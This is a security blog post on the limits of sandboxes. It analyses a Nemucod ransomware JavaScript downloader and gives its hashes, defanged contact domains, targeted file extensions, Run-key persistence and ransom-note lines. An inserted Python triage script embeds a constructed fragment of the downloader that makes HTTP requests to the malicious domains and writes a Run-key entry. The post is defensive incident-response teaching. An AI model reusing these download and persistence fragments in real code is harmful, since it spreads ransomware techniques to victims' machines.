Sandbox and Malware

Do not get me wrong: sandboxes are a very useful tool when it comes to looking at potentially malicious artefacts, primarily because they offer a quick analysis of a sample that gives responders a better understanding of it at low risk to the organisation.

They are not, however, a complete assessment of the artefact: they only report what was observed during the run, such as the domains accessed and the file changes made.

Take this public sample:

https://malwr.com/analysis/MTM4MjVkOWM2MDlhNGFjMWJkNDM1MjY1NDllYTFlZWY/

FILE NAME: 000239544.doc.js
FILE SIZE: 23074 bytes
FILE TYPE: ASCII text, with very long lines, with no line terminators
MD5: 2019aac5b5d8a0fbacae8c8a243d9879
SHA1: 634cf6cfe44a2fd6334c1acba6850305bdf573f6
SHA256: 6c8b19b272669a727c80b4b034da85a72f09aabc8e08de43da8c74c5229b3b7c

The analysis highlights that the sample performs some HTTP GET requests to

www[.]congress-hotel-hannover[.]de/ as well as traffic to the IP 62[.]210[.]131[.]107

There was no indication of what the traffic was. These indicators of compromise would often be blocked on perimeter controls such as firewalls to prevent the sample from communicating or detonating, but they give no indication of what you are actually dealing with.

However, by analysing the script code (available in the Static Analysis/Strings section of the sample URL) there are additional indicators that may otherwise have been missed:

  • profwebexpert[.]com
  • topikriau[.]com
  • umusomyi[.]com
  • 1hrdesigns[.]com

The first part of the script is concerned with constructing the URL and retrieving data, which is then written to disk as a .exe. The rest of the script reveals useful indicators of what the sample is designed to do.

fp.WriteLine("ATTENTION!");
fp.WriteLine("");
fp.WriteLine("All your documents, photos, databases and other important personal files");
fp.WriteLine("were encrypted using strong RSA-1024 algorithm with a unique key.");
fp.WriteLine("To restore your files you have to pay "+bc+" BTC (bitcoins)."

The script appears to search for the following file types:

*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk

and passes them to the downloaded executable to encrypt. It maintains persistence by creating an entry in the Run key of the registry. Any file that is identified appears to have ".crypted" appended to its name.

This indicates that this is a type of ransomware; the rest of the script creates the ransom note and the instructions on how to pay.

Searching for .crypted indicates this is the Nemucod Trojan's .CRYPTED ransomware. If nothing was encrypted you may think all is well. Further research into the Nemucod Trojan downloader, however, highlights that ransomware is just one component: it is capable of downloading additional malware, which a responder will need to look into for other indicators present on the endpoint.
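As an added example (my own illustration, not the author's tooling and not code from the sample): a small Python triage script that pulls the kinds of indicators described above out of a de-obfuscated script in one pass, so that the contact domains, targeted extensions, persistence key, ransom note and the appended ".crypted" extension are all surfaced rather than only what the sandbox happened to see. The embedded sample is a constructed fragment shaped like the downloader, not the real 000239544.doc.js; the domains and IP are the ones quoted in this post, while the variable names, the /counter/ path and the Run value name are assumed placeholders.

```python
import re

# Constructed de-obfuscated fragment in the shape of the downloader discussed above.
# NOT the real 000239544.doc.js: the four domains, the hotel domain and the IP are the
# ones quoted in the post; variable names, the /counter/ path and the Run value name
# are assumed placeholders.
SAMPLE_JS = r'''
var dn = ["profwebexpert.com", "topikriau.com", "umusomyi.com", "1hrdesigns.com"];
var c2 = "http://www.congress-hotel-hannover.de/"; var ip = "62.210.131.107";
var ws = new ActiveXObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + "\\a" + ".exe";
for (var i = 0; i < dn.length; i++) {
  var xo = new ActiveXObject("MSXML2.XMLHTTP");
  xo.open("GET", "http://" + dn[i] + "/counter/?id=1", false);
}
var ext = "*.zip *.rar *.7z *.doc *.docx *.pdf *.jpg *.vmdk";
ws.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Crypted", fn);
fp.WriteLine("ATTENTION!");
fp.WriteLine("");
fp.WriteLine("were encrypted using strong RSA-1024 algorithm with a unique key.");
fp.WriteLine("To restore your files you have to pay " + bc + " BTC (bitcoins).");
var newname = f.Path + ".crypted";
'''

STRING_LIT = re.compile(r'"((?:[^"\\]|\\.)*)"')            # double-quoted JS literals
DOMAIN = re.compile(r'^(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})(?:[/:].*)?$')
IPV4 = re.compile(r'^(?:\d{1,3}\.){3}\d{1,3}$')
GLOB_EXT = re.compile(r'\*\.([a-z0-9]+)')                  # "*.doc" style search masks
APPENDED_EXT = re.compile(r'\+\s*"(\.[a-z0-9]+)"')          # x + ".exe", f.Path + ".crypted"
WRITELINE = re.compile(r'WriteLine\("((?:[^"\\]|\\.)*)"')  # ransom note lines


def string_literals(js):
    """All double-quoted literals, with JS '\\\\' collapsed to a single backslash."""
    return [m.group(1).replace("\\\\", "\\") for m in STRING_LIT.finditer(js)]


def _dedupe(items):
    seen, out = set(), []
    for it in items:
        if it not in seen:
            seen.add(it)
            out.append(it)
    return out


def extract_domains(js):
    """Lowercase hostnames found in literals (case-sensitive on purpose so
    'MSXML2.XMLHTTP' and 'WScript.Shell' are not reported as domains)."""
    found = set()
    for lit in string_literals(js):
        m = DOMAIN.match(lit)
        if m:
            found.add(m.group(1))
    return sorted(found)


def extract_ips(js):
    return sorted({lit for lit in string_literals(js) if IPV4.match(lit)})


def targeted_extensions(js):
    """Extensions the script searches for, in the order they appear."""
    return _dedupe("." + m.group(1) for m in GLOB_EXT.finditer(js))


def persistence_keys(js):
    """Literals that name a ...\\CurrentVersion\\Run value."""
    return [lit for lit in string_literals(js) if "\\currentversion\\run" in lit.lower()]


def ransom_note(js):
    return [m.group(1) for m in WRITELINE.finditer(js) if m.group(1)]


def appended_extensions(js):
    """Extensions concatenated onto a path: the dropped .exe and the rename marker."""
    return _dedupe(m.group(1) for m in APPENDED_EXT.finditer(js))


def defang(ioc):
    return ioc.replace(".", "[.]")


def triage(js):
    note = " ".join(ransom_note(js)).lower()
    appended = appended_extensions(js)
    renames = [e for e in appended if e not in (".exe", ".dll", ".scr")]
    if "encrypted" in note and renames:
        verdict = "ransomware"          # note + rename marker: encryptor behaviour
    elif extract_domains(js) and ".exe" in appended:
        verdict = "downloader"          # fetches and drops an executable only
    else:
        verdict = "unknown"
    return {
        "domains": [defang(d) for d in extract_domains(js)],
        "ips": [defang(i) for i in extract_ips(js)],
        "targeted_extensions": targeted_extensions(js),
        "persistence": persistence_keys(js),
        "rename_marker": renames,
        "ransom_note": ransom_note(js),
        "verdict": verdict,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_JS).items():
        print(f"{key}: {value}")
```

Run against a real de-obfuscated script the output feeds straight into blocking (the defanged domain and IP list) and into endpoint hunting (the Run value and the rename marker); the heuristics are deliberately narrow, so treat an "unknown" verdict as "read the code", not as "benign".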

Although sandboxes have their uses, and running multiple sandboxes is an advantage, there has to be a balance between relying on automated tools and looking into samples in more detail.

Often this comes down to the time and skills available. The above was de-obfuscated using JSDetox and the rest was done by reading through the code.